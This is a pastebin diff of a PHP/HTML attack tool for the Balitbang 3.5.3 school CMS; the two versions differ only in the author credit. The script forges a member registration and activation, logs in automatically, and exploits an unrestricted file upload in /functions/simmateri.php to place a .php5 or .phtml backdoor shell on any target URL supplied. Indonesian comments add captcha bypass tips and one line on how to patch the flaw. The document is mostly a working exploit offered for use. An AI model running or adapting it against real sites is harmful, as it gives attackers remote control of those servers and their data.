View difference between Paste ID: <a href="/3r2xXq06">3r2xXq06</a> and <a href="/L4Dk4Bxi">L4Dk4Bxi</a>

<html>
1		<html>
2		<!---
3	-	// script ini dibuat berdasarkan iseng saja... :)
3	+	// { Attacker Alone Cyber }
4	-	// by. kitasemua
4	+	// by. MR.V4N
5		// --------------------------
6		// Simpan script ini dengan nama: test.php
7		// - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
8		// - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
9		// - Format shell: .phtml, .php5
10		// --------------------------
11		// Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php
12		// Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php
13		// --------------------------
14		// Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
15		// --------------------------
16		-->
17		<head>
18		<title>Balitbang 3.5.3</title>
19		</head>
20		<style type="text/css">
21		input[type=text],input[type=code],input[type=password]{
22		border:1px solid #c0c0c0;
23		height:24px;
24		padding:5px;
25		}
26		</style>
27		<body>
28		<?php
29		function hex($str='',$code='') {
30		if(($code>=0)and($code<100)) {
31		$t .=dechex(strlen($str)+$code)."g";
32		$str=strrev($str);
33		for($i=0;$i<=strlen($str)-1;$i++) {
34		$t .=dechex(ord(substr($str,$i,1))+$code);
35		}
36		}
37		return $t;
38		}
39		function unhex($str='',$code='') {
40		$all=explode("g",$str);
41		$head=hexdec($all[0])-$code;
42		$content=$all[1];
43		if($head==(strlen($content)/2)) {
44		for($i=0;$i<=$head-1;$i++) {
45		$t .=chr(hexdec(substr($content,$i*2,2))-$code);
46		}
47		$t =strrev($t);
48		}
49		return $t;
50		}
51		$target = $_GET['target'];
52		$ur_target = $target."/member/membersave.php";
53		$ur_upload = $target."/functions/simmateri.php";
54		$captcha = $target."/functions/captcha/captcha.php";
55		$ur_login = $target."/member/ajax_login.php";
56		$userx = $_GET['n'];
57		$passx = $_GET['p'];
58		if(isset($_POST['next'])){
59		$tar = $_POST['tar'];
60		$n = $_POST['n'];
61		$p = $_POST['p'];
62		header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
63		}
64		echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>";
65		?>
66		<form method="post" action="" enctype="multipart/form-data">
67		<table id=tablebaru cellspacing='1' cellpadding='3'>
68		<tr>
69		<td>target</td>
70		<td>:</td>
71		<td><input type="text" name="tar" size="61" placeholder='http://'/></td>
72		</tr>
73		<tr>
74		<td>username</td>
75		<td>:</td>
76		<td><input type="text" name="n" size="61"/></td>
77		</tr>
78		<tr>
79		<td>password</td>
80		<td>:</td>
81		<td><input type="text" name="p" size="61"/></td>
82		</tr>
83		<tr>
84		<td></td>
85		<td></td>
86		<td><input type="submit" name="next" value="NEXT »"/></td>
87		</tr>
88		</table>
89		</form>
90		<hr>
91		<?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
92		$asli = hex($userx,"82");
93		$pass = hex($passx,"82");
94		echo "username : <b>$userx</b><br>";
95		echo "password : <b>$passx</b><hr>";
96		?>
97		<form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
98		<input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
99		<input type=hidden name='name' value='ganteng'/>
100		<input type=hidden name='username' value='<?php echo $userx;?>'/>
101		<input type=hidden name='password' value='<?php echo $passx;?>'/>
102		<input type=hidden name='email' value='abc@abc.abc'/>
103		<input type=hidden name='kelamin' value='m'/>
104		<input type=hidden name='jenis' value='Tamu'>
105		<input type=hidden name='kelas' value=''/>
106		<input type=hidden name='hari' value='01'/>
107		<input type=hidden name='bulan' value='01'/>
108		<input type=hidden name='tahun' value='1995'/>
109		<input type=hidden name='nis' value=''/>
110		<input type=hidden name='pertanyaan' value='1'/>
111		<input type=hidden name='jawaban' value='1'/>
112		<input type=hidden name='kerja' value='Guru'/>
113		<input type=hidden name='alamat' value='jauh'/>
114		<input type=hidden name='sekolah' value='terserah'/>
115		<input type=hidden name='telp' value='0'/>
116		<input type=hidden name='blog' value=''/>
117		<input type=hidden name='tentang' value='terserah'/>
118		<input type=hidden name='country' value='INDONESIA'/>
119		<input type=hidden name='stprofil' value='open'/>
120		<input type=hidden name='stblog' value='on'/>
121		<table>
122		<tr>
123		<td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
124		<td rowspan="2" valign="top"><i>» capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
125		</tr>
126		<tr>
127		<td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
128		<td valign="top"><input type=submit name='submit' value='GO »'/></td>
129		</tr>
130		</table>
131		</form>
132		<?php
133		echo "<!--
134		ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
135		-->
136		";
137		echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
138		<br><i>» capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>";
139		} else if(isset($_GET['load']) && $_GET['load'] == "upload"){
140		?>
141		<script type="text/javascript">
142		window.onload = function(){
143		document.forms['login_form'].submit()
144
145		}
146		function setURL(url){
147		document.getElementById('verif').src = url;
148		}
149		</script>
150		<form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
151		<input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
152		<input type='hidden' name='password' value="<?php echo $passx;?>"/>
153		Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
154		</form>
155		<div style='margin-top:-20px;'>
156		<iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
157		</div>
158		<form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
159		<input type='hidden' name='pesan' value='abcabcabc'/></td>
160		<table cellspacing='1' cellpadding='3'>
161		<tr>
162		<td valign='top'>File</td>
163		<td valign='top'>:</td>
164		<td valign='top'><input type='file' name='file'></td>
165		<td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
166		</tr>
167		<tr>
168		<td valign='top' colspan="4"><i>» capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
169		</tr>
170		<tr>
171		<td valign='top' colspan="4">
172		hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br>
173		hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
174		</tr>
175		</table>
176		<input type=hidden name='st' value='ganteng'>
177		<input type=hidden name='nis' value=''>
178		<input type=hidden name='idtugas' value=''>
179		</form>
180		<hr>
181		<?php } ?>
182		</body>
183		</html>